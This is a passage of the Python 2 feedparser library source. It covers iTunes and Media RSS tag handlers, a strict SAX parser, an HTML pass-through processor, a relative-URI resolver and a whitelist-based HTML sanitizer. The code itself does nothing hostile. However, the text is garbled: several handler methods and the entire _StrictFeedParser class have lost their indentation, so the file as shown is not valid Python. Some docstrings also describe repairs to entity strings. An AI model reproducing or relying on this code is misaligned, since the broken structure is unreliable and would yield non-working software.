    _end_content_encoded = _end_content
    _end_fullitem = _end_content
    def _start_itunes_image(self, attrsD):
        # The image URI may appear as either 'href' or 'url'.
        self.push('itunes_image', 0)
        if attrsD.get('href'):
            self._getContext()['image'] = FeedParserDict({'href': attrsD.get('href')})
        elif attrsD.get('url'):
            self._getContext()['image'] = FeedParserDict({'href': attrsD.get('url')})
    _start_itunes_link = _start_itunes_image
def _end_itunes_block(self):
value = self.pop('itunes_block', 0)
self._getContext()['itunes_block'] = (value == 'yes') and 1 or 0
    def _end_itunes_explicit(self):
        value = self.pop('itunes_explicit', 0)
        # Convert 'yes' -> True, 'clean' to False, and any other value to None
        # False and None both evaluate as False, so the difference can be ignored
        # by applications that only need to know if the content is explicit.
        # Index trick: 'yes' -> index 2 -> True; 'clean' -> index 1 (via the
        # boolean True==1) -> False; anything else -> index 0 -> None.
        self._getContext()['itunes_explicit'] = (None, False, True)[(value == 'yes' and 2) or value == 'clean' or 0]
    def _start_media_group(self, attrsD):
        # don't do anything, but don't break the enclosed tags either
        pass
    def _start_media_credit(self, attrsD):
        # Each media:credit is appended as its own dict of attributes.
        context = self._getContext()
        context.setdefault('media_credit', [])
        context['media_credit'].append(attrsD)
        self.push('credit', 1)
def _end_media_credit(self):
credit = self.pop('credit')
if credit != None and len(credit.strip()) != 0:
context = self._getContext()
context['media_credit'][-1]['content'] = credit
    def _start_media_restriction(self, attrsD):
        # Only the first media:restriction's attributes are kept (setdefault).
        context = self._getContext()
        context.setdefault('media_restriction', attrsD)
        self.push('restriction', 1)
def _end_media_restriction(self):
restriction = self.pop('restriction')
if restriction != None and len(restriction.strip()) != 0:
context = self._getContext()
context['media_restriction']['content'] = restriction
    def _start_media_license(self, attrsD):
        # Only the first media:license's attributes are kept (setdefault).
        context = self._getContext()
        context.setdefault('media_license', attrsD)
        self.push('license', 1)
def _end_media_license(self):
license = self.pop('license')
if license != None and len(license.strip()) != 0:
context = self._getContext()
context['media_license']['content'] = license
    def _start_media_content(self, attrsD):
        # Each media:content is appended as its own dict of attributes.
        context = self._getContext()
        context.setdefault('media_content', [])
        context['media_content'].append(attrsD)
    def _start_media_thumbnail(self, attrsD):
        context = self._getContext()
        context.setdefault('media_thumbnail', [])
        self.push('url', 1) # new
        context['media_thumbnail'].append(attrsD)
def _end_media_thumbnail(self):
url = self.pop('url')
context = self._getContext()
if url != None and len(url.strip()) != 0:
if 'url' not in context['media_thumbnail'][-1]:
context['media_thumbnail'][-1]['url'] = url
    def _start_media_player(self, attrsD):
        # media:player attributes (url, height, width) become the dict.
        self.push('media_player', 0)
        self._getContext()['media_player'] = FeedParserDict(attrsD)
    def _end_media_player(self):
        # The element's text becomes the player's 'content'.
        value = self.pop('media_player')
        context = self._getContext()
        context['media_player']['content'] = value
    def _start_newlocation(self, attrsD):
        self.push('newlocation', 1)
    def _end_newlocation(self):
        url = self.pop('newlocation')
        context = self._getContext()
        # don't set newlocation if the context isn't right
        if context is not self.feeddata:
            return
        context['newlocation'] = _makeSafeAbsoluteURI(self.baseuri, url.strip())
    def _start_psc_chapters(self, attrsD):
        # Only the first <psc:chapters> element is honored per document.
        if self.psc_chapters_flag is None:
            # Transition from None -> True
            self.psc_chapters_flag = True
            attrsD['chapters'] = []
            self._getContext()['psc_chapters'] = FeedParserDict(attrsD)
    def _end_psc_chapters(self):
        # Transition from True -> False
        self.psc_chapters_flag = False
    def _start_psc_chapter(self, attrsD):
        # Chapters are only collected while inside the first <psc:chapters>.
        if self.psc_chapters_flag:
            start = self._getAttribute(attrsD, 'start')
            attrsD['start_parsed'] = _parse_psc_chapter_start(start)
            context = self._getContext()['psc_chapters']
            context['chapters'].append(FeedParserDict(attrsD))
if _XML_AVAILABLE:
class _StrictFeedParser(_FeedParserMixin, xml.sax.handler.ContentHandler):
def __init__(self, baseuri, baselang, encoding):
xml.sax.handler.ContentHandler.__init__(self)
_FeedParserMixin.__init__(self, baseuri, baselang, encoding)
self.bozo = 0
self.exc = None
self.decls = {}
def startPrefixMapping(self, prefix, uri):
if not uri:
return
# Jython uses '' instead of None; standardize on None
prefix = prefix or None
self.trackNamespace(prefix, uri)
if prefix and uri == 'http://www.w3.org/1999/xlink':
self.decls['xmlns:' + prefix] = uri
def startElementNS(self, name, qname, attrs):
namespace, localname = name
lowernamespace = str(namespace or '').lower()
if lowernamespace.find(u'backend.userland.com/rss') <> -1:
# match any backend.userland.com namespace
namespace = u'http://backend.userland.com/rss'
lowernamespace = namespace
if qname and qname.find(':') > 0:
givenprefix = qname.split(':')[0]
else:
givenprefix = None
prefix = self._matchnamespaces.get(lowernamespace, givenprefix)
if givenprefix and (prefix == None or (prefix == '' and lowernamespace == '')) and givenprefix not in self.namespacesInUse:
raise UndeclaredNamespace, "'%s' is not associated with a namespace" % givenprefix
localname = str(localname).lower()
# qname implementation is horribly broken in Python 2.1 (it
# doesn't report any), and slightly broken in Python 2.2 (it
# doesn't report the xml: namespace). So we match up namespaces
# with a known list first, and then possibly override them with
# the qnames the SAX parser gives us (if indeed it gives us any
# at all). Thanks to MatejC for helping me test this and
# tirelessly telling me that it didn't work yet.
attrsD, self.decls = self.decls, {}
if localname=='math' and namespace=='http://www.w3.org/1998/Math/MathML':
attrsD['xmlns']=namespace
if localname=='svg' and namespace=='http://www.w3.org/2000/svg':
attrsD['xmlns']=namespace
if prefix:
localname = prefix.lower() + ':' + localname
elif namespace and not qname: #Expat
for name,value in self.namespacesInUse.items():
if name and value == namespace:
localname = name + ':' + localname
break
for (namespace, attrlocalname), attrvalue in attrs.items():
lowernamespace = (namespace or '').lower()
prefix = self._matchnamespaces.get(lowernamespace, '')
if prefix:
attrlocalname = prefix + ':' + attrlocalname
attrsD[str(attrlocalname).lower()] = attrvalue
for qname in attrs.getQNames():
attrsD[str(qname).lower()] = attrs.getValueByQName(qname)
localname = str(localname).lower()
self.unknown_starttag(localname, attrsD.items())
def characters(self, text):
self.handle_data(text)
def endElementNS(self, name, qname):
namespace, localname = name
lowernamespace = str(namespace or '').lower()
if qname and qname.find(':') > 0:
givenprefix = qname.split(':')[0]
else:
givenprefix = ''
prefix = self._matchnamespaces.get(lowernamespace, givenprefix)
if prefix:
localname = prefix + ':' + localname
elif namespace and not qname: #Expat
for name,value in self.namespacesInUse.items():
if name and value == namespace:
localname = name + ':' + localname
break
localname = str(localname).lower()
self.unknown_endtag(localname)
def error(self, exc):
self.bozo = 1
self.exc = exc
# drv_libxml2 calls warning() in some cases
warning = error
def fatalError(self, exc):
self.error(exc)
raise exc
class _BaseHTMLProcessor(sgmllib.SGMLParser):
    """SGML/HTML pass-through processor: parses with sgmllib and rebuilds the
    (normalized) markup in self.pieces.

    Fix: several string literals that re-escape characters as HTML entities
    had been corrupted into no-op self-replacements; the entity spellings
    ('&lt;', '&gt;', '&quot;', '&amp;', '&#39;', '&#34;') are restored below.
    """
    special = re.compile('''[<>'"]''')
    # Matches '&' that does not already begin a character/entity reference.
    bare_ampersand = re.compile("&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)")
    # Void elements: serialized as '<tag />', never given a closing tag.
    elements_no_end_tag = set([
      'area', 'base', 'basefont', 'br', 'col', 'command', 'embed', 'frame',
      'hr', 'img', 'input', 'isindex', 'keygen', 'link', 'meta', 'param',
      'source', 'track', 'wbr'
    ])
    def __init__(self, encoding, _type):
        self.encoding = encoding
        self._type = _type
        sgmllib.SGMLParser.__init__(self)
    def reset(self):
        self.pieces = []
        sgmllib.SGMLParser.reset(self)
    def _shorttag_replace(self, match):
        # Expand '<tag/>' to '<tag></tag>' unless tag is a void element.
        tag = match.group(1)
        if tag in self.elements_no_end_tag:
            return '<' + tag + ' />'
        else:
            return '<' + tag + '></' + tag + '>'
    # By declaring these methods and overriding their compiled code
    # with the code from sgmllib, the original code will execute in
    # feedparser's scope instead of sgmllib's. This means that the
    # `tagfind` and `charref` regular expressions will be found as
    # they're declared above, not as they're declared in sgmllib.
    # NOTE: func_code is Python 2-only (renamed __code__ in Python 3).
    def goahead(self, i):
        pass
    goahead.func_code = sgmllib.SGMLParser.goahead.func_code
    def __parse_starttag(self, i):
        pass
    __parse_starttag.func_code = sgmllib.SGMLParser.parse_starttag.func_code
    def parse_starttag(self,i):
        j = self.__parse_starttag(i)
        if self._type == 'application/xhtml+xml':
            if j>2 and self.rawdata[j-2:j]=='/>':
                self.unknown_endtag(self.lasttag)
        return j
    def feed(self, data):
        # Escape '<!' unless it begins a DOCTYPE, comment, or CDATA section.
        data = re.compile(r'<!((?!DOCTYPE|--|\[))', re.IGNORECASE).sub(r'&lt;!\1', data)
        data = re.sub(r'<([^<>\s]+?)\s*/>', self._shorttag_replace, data)
        # Decode numeric quote references so attribute parsing sees literals.
        data = data.replace('&#39;', "'")
        data = data.replace('&#34;', '"')
        try:
            bytes
            if bytes is str:
                raise NameError
            self.encoding = self.encoding + u'_INVALID_PYTHON_3'
        except NameError:
            if self.encoding and isinstance(data, unicode):
                data = data.encode(self.encoding)
        sgmllib.SGMLParser.feed(self, data)
        sgmllib.SGMLParser.close(self)
    def normalize_attrs(self, attrs):
        if not attrs:
            return attrs
        # utility method to be called by descendants
        # Lowercase keys (last duplicate wins), lowercase rel/type values.
        attrs = dict([(k.lower(), v) for k, v in attrs]).items()
        attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in attrs]
        attrs.sort()
        return attrs
    def unknown_starttag(self, tag, attrs):
        # called for each start tag
        # attrs is a list of (attr, value) tuples
        # e.g. for <pre class='screen'>, tag='pre', attrs=[('class', 'screen')]
        uattrs = []
        strattrs=''
        if attrs:
            for key, value in attrs:
                # Re-escape markup characters and bare ampersands so the
                # reserialized attribute value is well-formed.
                value=value.replace('>','&gt;').replace('<','&lt;').replace('"','&quot;')
                value = self.bare_ampersand.sub("&amp;", value)
                # thanks to Kevin Marks for this breathtaking hack to deal with (valid) high-bit attribute values in UTF-8 feeds
                if not isinstance(value, unicode):
                    value = value.decode(self.encoding, 'ignore')
                try:
                    # Currently, in Python 3 the key is already a str, and cannot be decoded again
                    uattrs.append((unicode(key, self.encoding), value))
                except TypeError:
                    uattrs.append((key, value))
            strattrs = u''.join([u' %s="%s"' % (key, value) for key, value in uattrs])
            if self.encoding:
                try:
                    strattrs = strattrs.encode(self.encoding)
                except (UnicodeEncodeError, LookupError):
                    pass
        if tag in self.elements_no_end_tag:
            self.pieces.append('<%s%s />' % (tag, strattrs))
        else:
            self.pieces.append('<%s%s>' % (tag, strattrs))
    def unknown_endtag(self, tag):
        # called for each end tag, e.g. for </pre>, tag will be 'pre'
        # Reconstruct the original end tag.
        if tag not in self.elements_no_end_tag:
            self.pieces.append("</%s>" % tag)
    def handle_charref(self, ref):
        # called for each character reference, e.g. for '&#160;', ref will be '160'
        # Reconstruct the original character reference.
        ref = ref.lower()
        if ref.startswith('x'):
            value = int(ref[1:], 16)
        else:
            value = int(ref)
        # Remap Windows-1252 codepoints to their Unicode equivalents.
        if value in _cp1252:
            self.pieces.append('&#%s;' % hex(ord(_cp1252[value]))[1:])
        else:
            self.pieces.append('&#%s;' % ref)
    def handle_entityref(self, ref):
        # called for each entity reference, e.g. for '&copy;', ref will be 'copy'
        # Reconstruct the original entity reference.
        if ref in name2codepoint or ref == 'apos':
            self.pieces.append('&%s;' % ref)
        else:
            # Unknown entity: leave the ampersand un-terminated.
            self.pieces.append('&%s' % ref)
    def handle_data(self, text):
        # called for each block of plain text, i.e. outside of any tag and
        # not containing any character or entity references
        # Store the original text verbatim.
        self.pieces.append(text)
    def handle_comment(self, text):
        # called for each HTML comment, e.g. <!-- insert Javascript code here -->
        # Reconstruct the original comment.
        self.pieces.append('<!--%s-->' % text)
    def handle_pi(self, text):
        # called for each processing instruction, e.g. <?instruction>
        # Reconstruct original processing instruction.
        self.pieces.append('<?%s>' % text)
    def handle_decl(self, text):
        # called for the DOCTYPE, if present, e.g.
        # <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
        #     "http://www.w3.org/TR/html4/loose.dtd">
        # Reconstruct original DOCTYPE
        self.pieces.append('<!%s>' % text)
    _new_declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9:]*\s*').match
    def _scan_name(self, i, declstartpos):
        # Scan a declaration name starting at index i; returns (name, end).
        rawdata = self.rawdata
        n = len(rawdata)
        if i == n:
            return None, -1
        m = self._new_declname_match(rawdata, i)
        if m:
            s = m.group()
            name = s.strip()
            if (i + len(s)) == n:
                return None, -1 # end of buffer
            return name.lower(), m.end()
        else:
            self.handle_data(rawdata)
#            self.updatepos(declstartpos, i)
            return None, -1
    def convert_charref(self, name):
        return '&#%s;' % name
    def convert_entityref(self, name):
        return '&%s;' % name
    def output(self):
        '''Return processed HTML as a single string'''
        return ''.join([str(p) for p in self.pieces])
    def parse_declaration(self, i):
        try:
            return sgmllib.SGMLParser.parse_declaration(self, i)
        except sgmllib.SGMLParseError:
            # escape the doctype declaration and continue parsing
            self.handle_data('&lt;')
            return i+1
class _LooseFeedParser(_FeedParserMixin, _BaseHTMLProcessor):
    """sgmllib-driven fallback parser for feeds that are not well-formed XML.

    Fix: the entity strings in decodeEntities/strattrs had been corrupted
    into no-op self-replacements (e.g. ``replace('<', '<')``); the intended
    numeric-reference -> named-entity normalization is restored.
    """
    def __init__(self, baseuri, baselang, encoding, entities):
        sgmllib.SGMLParser.__init__(self)
        _FeedParserMixin.__init__(self, baseuri, baselang, encoding)
        _BaseHTMLProcessor.__init__(self, encoding, 'application/xhtml+xml')
        self.entities=entities
    def decodeEntities(self, element, data):
        # Normalize numeric character references to the five XML named
        # entities so later processing sees a canonical form.
        data = data.replace('&#60;', '&lt;')
        data = data.replace('&#x3c;', '&lt;')
        data = data.replace('&#x3C;', '&lt;')
        data = data.replace('&#62;', '&gt;')
        data = data.replace('&#x3e;', '&gt;')
        data = data.replace('&#x3E;', '&gt;')
        data = data.replace('&#38;', '&amp;')
        data = data.replace('&#x26;', '&amp;')
        data = data.replace('&#34;', '&quot;')
        data = data.replace('&#x22;', '&quot;')
        data = data.replace('&#39;', '&apos;')
        data = data.replace('&#x27;', '&apos;')
        if not self.contentparams.get('type', u'xml').endswith(u'xml'):
            # Non-XML content: decode the named entities to literal chars.
            data = data.replace('&lt;', '<')
            data = data.replace('&gt;', '>')
            data = data.replace('&amp;', '&')
            data = data.replace('&quot;', '"')
            data = data.replace('&apos;', "'")
        return data
    def strattrs(self, attrs):
        # Serialize attrs, escaping double quotes inside values.
        return ''.join([' %s="%s"' % (n,v.replace('"','&quot;')) for n,v in attrs])
class _RelativeURIResolver(_BaseHTMLProcessor):
    # HTML processor that rewrites relative URIs in known (tag, attribute)
    # pairs as absolute URIs against a base URI.
    relative_uris = set([('a', 'href'),
                         ('applet', 'codebase'),
                         ('area', 'href'),
                         ('blockquote', 'cite'),
                         ('body', 'background'),
                         ('del', 'cite'),
                         ('form', 'action'),
                         ('frame', 'longdesc'),
                         ('frame', 'src'),
                         ('iframe', 'longdesc'),
                         ('iframe', 'src'),
                         ('head', 'profile'),
                         ('img', 'longdesc'),
                         ('img', 'src'),
                         ('img', 'usemap'),
                         ('input', 'src'),
                         ('input', 'usemap'),
                         ('ins', 'cite'),
                         ('link', 'href'),
                         ('object', 'classid'),
                         ('object', 'codebase'),
                         ('object', 'data'),
                         ('object', 'usemap'),
                         ('q', 'cite'),
                         ('script', 'src'),
                         ('video', 'poster')])
    def __init__(self, baseuri, encoding, _type):
        _BaseHTMLProcessor.__init__(self, encoding, _type)
        self.baseuri = baseuri
    def resolveURI(self, uri):
        return _makeSafeAbsoluteURI(self.baseuri, uri.strip())
    def unknown_starttag(self, tag, attrs):
        attrs = self.normalize_attrs(attrs)
        # NOTE(review): with the and/or idiom, a falsy resolved URI (e.g. u''
        # when the scheme is rejected) falls back to the original value —
        # confirm this pass-through is intended before changing it.
        attrs = [(key, ((tag, key) in self.relative_uris) and self.resolveURI(value) or value) for key, value in attrs]
        _BaseHTMLProcessor.unknown_starttag(self, tag, attrs)
def _resolveRelativeURIs(htmlSource, baseURI, encoding, _type):
    """Rewrite relative URIs in *htmlSource* as absolute against *baseURI*.

    Returns the input unchanged when no SGML parser is available.
    """
    if not _SGML_AVAILABLE:
        return htmlSource
    resolver = _RelativeURIResolver(baseURI, encoding, _type)
    resolver.feed(htmlSource)
    return resolver.output()
def _makeSafeAbsoluteURI(base, rel=None):
    """Join *base* and *rel* into an absolute URI, returning u'' unless the
    result uses a scheme in ACCEPTABLE_URI_SCHEMES.

    When ACCEPTABLE_URI_SCHEMES is empty, filtering is disabled and the
    plain join is returned.
    """
    # bail if ACCEPTABLE_URI_SCHEMES is empty
    if not ACCEPTABLE_URI_SCHEMES:
        return _urljoin(base, rel or u'')
    if not base:
        return rel or u''
    if rel:
        joined = _urljoin(base, rel)
        if joined.strip().split(':', 1)[0] in ACCEPTABLE_URI_SCHEMES:
            return joined
        return u''
    # No relative part: vet the base URI's scheme on its own.
    try:
        scheme = urlparse.urlparse(base)[0]
    except ValueError:
        return u''
    if not scheme or scheme in ACCEPTABLE_URI_SCHEMES:
        return base
    return u''
class _HTMLSanitizer(_BaseHTMLProcessor):
    # Whitelist-based HTML sanitizer: only elements/attributes/CSS in the
    # sets below survive; everything else is dropped.  MathML and SVG
    # subtrees are allowed only while inside a properly-namespaced root.
    acceptable_elements = set(['a', 'abbr', 'acronym', 'address', 'area',
        'article', 'aside', 'audio', 'b', 'big', 'blockquote', 'br', 'button',
        'canvas', 'caption', 'center', 'cite', 'code', 'col', 'colgroup',
        'command', 'datagrid', 'datalist', 'dd', 'del', 'details', 'dfn',
        'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'event-source', 'fieldset',
        'figcaption', 'figure', 'footer', 'font', 'form', 'header', 'h1',
        'h2', 'h3', 'h4', 'h5', 'h6', 'hr', 'i', 'img', 'input', 'ins',
        'keygen', 'kbd', 'label', 'legend', 'li', 'm', 'map', 'menu', 'meter',
        'multicol', 'nav', 'nextid', 'ol', 'output', 'optgroup', 'option',
        'p', 'pre', 'progress', 'q', 's', 'samp', 'section', 'select',
        'small', 'sound', 'source', 'spacer', 'span', 'strike', 'strong',
        'sub', 'sup', 'table', 'tbody', 'td', 'textarea', 'time', 'tfoot',
        'th', 'thead', 'tr', 'tt', 'u', 'ul', 'var', 'video', 'noscript'])
    acceptable_attributes = set(['abbr', 'accept', 'accept-charset', 'accesskey',
        'action', 'align', 'alt', 'autocomplete', 'autofocus', 'axis',
        'background', 'balance', 'bgcolor', 'bgproperties', 'border',
        'bordercolor', 'bordercolordark', 'bordercolorlight', 'bottompadding',
        'cellpadding', 'cellspacing', 'ch', 'challenge', 'char', 'charoff',
        'choff', 'charset', 'checked', 'cite', 'class', 'clear', 'color', 'cols',
        'colspan', 'compact', 'contenteditable', 'controls', 'coords', 'data',
        'datafld', 'datapagesize', 'datasrc', 'datetime', 'default', 'delay',
        'dir', 'disabled', 'draggable', 'dynsrc', 'enctype', 'end', 'face', 'for',
        'form', 'frame', 'galleryimg', 'gutter', 'headers', 'height', 'hidefocus',
        'hidden', 'high', 'href', 'hreflang', 'hspace', 'icon', 'id', 'inputmode',
        'ismap', 'keytype', 'label', 'leftspacing', 'lang', 'list', 'longdesc',
        'loop', 'loopcount', 'loopend', 'loopstart', 'low', 'lowsrc', 'max',
        'maxlength', 'media', 'method', 'min', 'multiple', 'name', 'nohref',
        'noshade', 'nowrap', 'open', 'optimum', 'pattern', 'ping', 'point-size',
        'poster', 'pqg', 'preload', 'prompt', 'radiogroup', 'readonly', 'rel',
        'repeat-max', 'repeat-min', 'replace', 'required', 'rev', 'rightspacing',
        'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size', 'span',
        'src', 'start', 'step', 'summary', 'suppress', 'tabindex', 'target',
        'template', 'title', 'toppadding', 'type', 'unselectable', 'usemap',
        'urn', 'valign', 'value', 'variable', 'volume', 'vspace', 'vrml',
        'width', 'wrap', 'xml:lang'])
    # Elements whose entire content (not just the tags) must be dropped.
    unacceptable_elements_with_end_tag = set(['script', 'applet', 'style'])
    acceptable_css_properties = set(['azimuth', 'background-color',
        'border-bottom-color', 'border-collapse', 'border-color',
        'border-left-color', 'border-right-color', 'border-top-color', 'clear',
        'color', 'cursor', 'direction', 'display', 'elevation', 'float', 'font',
        'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight',
        'height', 'letter-spacing', 'line-height', 'overflow', 'pause',
        'pause-after', 'pause-before', 'pitch', 'pitch-range', 'richness',
        'speak', 'speak-header', 'speak-numeral', 'speak-punctuation',
        'speech-rate', 'stress', 'text-align', 'text-decoration', 'text-indent',
        'unicode-bidi', 'vertical-align', 'voice-family', 'volume',
        'white-space', 'width'])
    # survey of common keywords found in feeds
    acceptable_css_keywords = set(['auto', 'aqua', 'black', 'block', 'blue',
        'bold', 'both', 'bottom', 'brown', 'center', 'collapse', 'dashed',
        'dotted', 'fuchsia', 'gray', 'green', '!important', 'italic', 'left',
        'lime', 'maroon', 'medium', 'none', 'navy', 'normal', 'nowrap', 'olive',
        'pointer', 'purple', 'red', 'right', 'solid', 'silver', 'teal', 'top',
        'transparent', 'underline', 'white', 'yellow'])
    valid_css_values = re.compile('^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|' +
      '\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$')
    mathml_elements = set(['annotation', 'annotation-xml', 'maction', 'math',
      'merror', 'mfenced', 'mfrac', 'mi', 'mmultiscripts', 'mn', 'mo', 'mover', 'mpadded',
      'mphantom', 'mprescripts', 'mroot', 'mrow', 'mspace', 'msqrt', 'mstyle',
      'msub', 'msubsup', 'msup', 'mtable', 'mtd', 'mtext', 'mtr', 'munder',
      'munderover', 'none', 'semantics'])
    mathml_attributes = set(['actiontype', 'align', 'columnalign', 'columnalign',
      'columnalign', 'close', 'columnlines', 'columnspacing', 'columnspan', 'depth',
      'display', 'displaystyle', 'encoding', 'equalcolumns', 'equalrows',
      'fence', 'fontstyle', 'fontweight', 'frame', 'height', 'linethickness',
      'lspace', 'mathbackground', 'mathcolor', 'mathvariant', 'mathvariant',
      'maxsize', 'minsize', 'open', 'other', 'rowalign', 'rowalign', 'rowalign',
      'rowlines', 'rowspacing', 'rowspan', 'rspace', 'scriptlevel', 'selection',
      'separator', 'separators', 'stretchy', 'width', 'width', 'xlink:href',
      'xlink:show', 'xlink:type', 'xmlns', 'xmlns:xlink'])
    # svgtiny - foreignObject + linearGradient + radialGradient + stop
    svg_elements = set(['a', 'animate', 'animateColor', 'animateMotion',
      'animateTransform', 'circle', 'defs', 'desc', 'ellipse', 'foreignObject',
      'font-face', 'font-face-name', 'font-face-src', 'g', 'glyph', 'hkern',
      'linearGradient', 'line', 'marker', 'metadata', 'missing-glyph', 'mpath',
      'path', 'polygon', 'polyline', 'radialGradient', 'rect', 'set', 'stop',
      'svg', 'switch', 'text', 'title', 'tspan', 'use'])
    # svgtiny + class + opacity + offset + xmlns + xmlns:xlink
    svg_attributes = set(['accent-height', 'accumulate', 'additive', 'alphabetic',
       'arabic-form', 'ascent', 'attributeName', 'attributeType',
       'baseProfile', 'bbox', 'begin', 'by', 'calcMode', 'cap-height',
       'class', 'color', 'color-rendering', 'content', 'cx', 'cy', 'd', 'dx',
       'dy', 'descent', 'display', 'dur', 'end', 'fill', 'fill-opacity',
       'fill-rule', 'font-family', 'font-size', 'font-stretch', 'font-style',
       'font-variant', 'font-weight', 'from', 'fx', 'fy', 'g1', 'g2',
       'glyph-name', 'gradientUnits', 'hanging', 'height', 'horiz-adv-x',
       'horiz-origin-x', 'id', 'ideographic', 'k', 'keyPoints', 'keySplines',
       'keyTimes', 'lang', 'mathematical', 'marker-end', 'marker-mid',
       'marker-start', 'markerHeight', 'markerUnits', 'markerWidth', 'max',
       'min', 'name', 'offset', 'opacity', 'orient', 'origin',
       'overline-position', 'overline-thickness', 'panose-1', 'path',
       'pathLength', 'points', 'preserveAspectRatio', 'r', 'refX', 'refY',
       'repeatCount', 'repeatDur', 'requiredExtensions', 'requiredFeatures',
       'restart', 'rotate', 'rx', 'ry', 'slope', 'stemh', 'stemv',
       'stop-color', 'stop-opacity', 'strikethrough-position',
       'strikethrough-thickness', 'stroke', 'stroke-dasharray',
       'stroke-dashoffset', 'stroke-linecap', 'stroke-linejoin',
       'stroke-miterlimit', 'stroke-opacity', 'stroke-width', 'systemLanguage',
       'target', 'text-anchor', 'to', 'transform', 'type', 'u1', 'u2',
       'underline-position', 'underline-thickness', 'unicode', 'unicode-range',
       'units-per-em', 'values', 'version', 'viewBox', 'visibility', 'width',
       'widths', 'x', 'x-height', 'x1', 'x2', 'xlink:actuate', 'xlink:arcrole',
       'xlink:href', 'xlink:role', 'xlink:show', 'xlink:title', 'xlink:type',
       'xml:base', 'xml:lang', 'xml:space', 'xmlns', 'xmlns:xlink', 'y', 'y1',
       'y2', 'zoomAndPan'])
    # Lazily-built maps from lowercased SVG names back to camelCase.
    svg_attr_map = None
    svg_elem_map = None
    acceptable_svg_properties = set([ 'fill', 'fill-opacity', 'fill-rule',
      'stroke', 'stroke-width', 'stroke-linecap', 'stroke-linejoin',
      'stroke-opacity'])
    def reset(self):
        _BaseHTMLProcessor.reset(self)
        # Depth inside script/applet/style; >0 means drop text entirely.
        self.unacceptablestack = 0
        self.mathmlOK = 0
        self.svgOK = 0
    def unknown_starttag(self, tag, attrs):
        acceptable_attributes = self.acceptable_attributes
        keymap = {}
        if not tag in self.acceptable_elements or self.svgOK:
            if tag in self.unacceptable_elements_with_end_tag:
                self.unacceptablestack += 1
            # add implicit namespaces to html5 inline svg/mathml
            if self._type.endswith('html'):
                if not dict(attrs).get('xmlns'):
                    if tag=='svg':
                        attrs.append( ('xmlns','http://www.w3.org/2000/svg') )
                    if tag=='math':
                        attrs.append( ('xmlns','http://www.w3.org/1998/Math/MathML') )
            # not otherwise acceptable, perhaps it is MathML or SVG?
            if tag=='math' and ('xmlns','http://www.w3.org/1998/Math/MathML') in attrs:
                self.mathmlOK += 1
            if tag=='svg' and ('xmlns','http://www.w3.org/2000/svg') in attrs:
                self.svgOK += 1
            # chose acceptable attributes based on tag class, else bail
            if self.mathmlOK and tag in self.mathml_elements:
                acceptable_attributes = self.mathml_attributes
            elif self.svgOK and tag in self.svg_elements:
                # for most vocabularies, lowercasing is a good idea. Many
                # svg elements, however, are camel case
                if not self.svg_attr_map:
                    lower=[attr.lower() for attr in self.svg_attributes]
                    mix=[a for a in self.svg_attributes if a not in lower]
                    self.svg_attributes = lower
                    self.svg_attr_map = dict([(a.lower(),a) for a in mix])
                    lower=[attr.lower() for attr in self.svg_elements]
                    mix=[a for a in self.svg_elements if a not in lower]
                    self.svg_elements = lower
                    self.svg_elem_map = dict([(a.lower(),a) for a in mix])
                acceptable_attributes = self.svg_attributes
                tag = self.svg_elem_map.get(tag,tag)
                keymap = self.svg_attr_map
            elif not tag in self.acceptable_elements:
                return
        # declare xlink namespace, if needed
        if self.mathmlOK or self.svgOK:
            # NOTE(review): tuple-parameter lambda is Python 2-only syntax.
            if filter(lambda (n,v): n.startswith('xlink:'),attrs):
                if not ('xmlns:xlink','http://www.w3.org/1999/xlink') in attrs:
                    attrs.append(('xmlns:xlink','http://www.w3.org/1999/xlink'))
        clean_attrs = []
        for key, value in self.normalize_attrs(attrs):
            if key in acceptable_attributes:
                key=keymap.get(key,key)
                # make sure the uri uses an acceptable uri scheme
                if key == u'href':
                    value = _makeSafeAbsoluteURI(value)
                clean_attrs.append((key,value))
            elif key=='style':
                clean_value = self.sanitize_style(value)
                if clean_value:
                    clean_attrs.append((key,clean_value))
        _BaseHTMLProcessor.unknown_starttag(self, tag, clean_attrs)
    def unknown_endtag(self, tag):
        if not tag in self.acceptable_elements:
            if tag in self.unacceptable_elements_with_end_tag:
                self.unacceptablestack -= 1
            if self.mathmlOK and tag in self.mathml_elements:
                if tag == 'math' and self.mathmlOK:
                    self.mathmlOK -= 1
            elif self.svgOK and tag in self.svg_elements:
                tag = self.svg_elem_map.get(tag,tag)
                if tag == 'svg' and self.svgOK:
                    self.svgOK -= 1
            else:
                return
        _BaseHTMLProcessor.unknown_endtag(self, tag)
    def handle_pi(self, text):
        # Drop processing instructions entirely.
        pass
    def handle_decl(self, text):
        # Drop declarations entirely.
        pass
    def handle_data(self, text):
        # Suppress text inside script/applet/style subtrees.
        if not self.unacceptablestack:
            _BaseHTMLProcessor.handle_data(self, text)
    def sanitize_style(self, style):
        # disallow urls
        style=re.compile('url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ',style)
        # gauntlet
        if not re.match("""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style):
            return ''
        # This replaced a regexp that used re.match and was prone to pathological back-tracking.
        if re.sub("\s*[-\w]+\s*:\s*[^:;]*;?", '', style).strip():
            return ''
        clean = []
        for prop,value in re.findall("([-\w]+)\s*:\s*([^:;]*)",style):
            if not value:
                continue
            if prop.lower() in self.acceptable_css_properties:
                clean.append(prop + ': ' + value + ';')
            elif prop.split('-')[0].lower() in ['background','border','margin','padding']:
                # Shorthand properties: every keyword/value must be whitelisted.
                for keyword in value.split():
                    if not keyword in self.acceptable_css_keywords and \
                        not self.valid_css_values.match(keyword):
                        break
                else:
                    clean.append(prop + ': ' + value + ';')
            elif self.svgOK and prop.lower() in self.acceptable_svg_properties:
                clean.append(prop + ': ' + value + ';')
        return ' '.join(clean)
    def parse_comment(self, i, report=1):
        ret = _BaseHTMLProcessor.parse_comment(self, i, report)
        if ret >= 0:
            return ret
        # if ret == -1, this may be a malicious attempt to circumvent
        # sanitization, or a page-destroying unclosed comment
